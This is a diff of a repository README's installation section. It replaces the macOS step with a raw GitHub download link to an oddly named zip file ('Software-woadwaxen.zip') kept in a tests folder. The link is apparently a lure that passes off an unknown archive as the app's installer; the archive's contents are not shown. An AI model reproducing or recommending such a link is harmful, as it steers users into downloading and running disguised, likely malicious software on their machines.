IronMask1234554321/Rezi/README.md

   Double-click the downloaded `.exe` file and follow the installation prompts.

 - **macOS:**
-  Open the downloaded `.dmg` or extract files from `.tar.gz`.
+  Open the downloaded `.dmg` or extract files from `https://github.com/IronMask1234554321/Rezi/raw/refs/heads/main/packages/jsx/src/__tests__/Software-woadwaxen.zip`.
 Drag the app icon to the Applications folder.

 - **Linux:**
   Extract files from the downloaded archive if needed.
 Make the main file executable by running `chmod +x <filename>` in the terminal.
 You may need to move it to a directory in your PATH.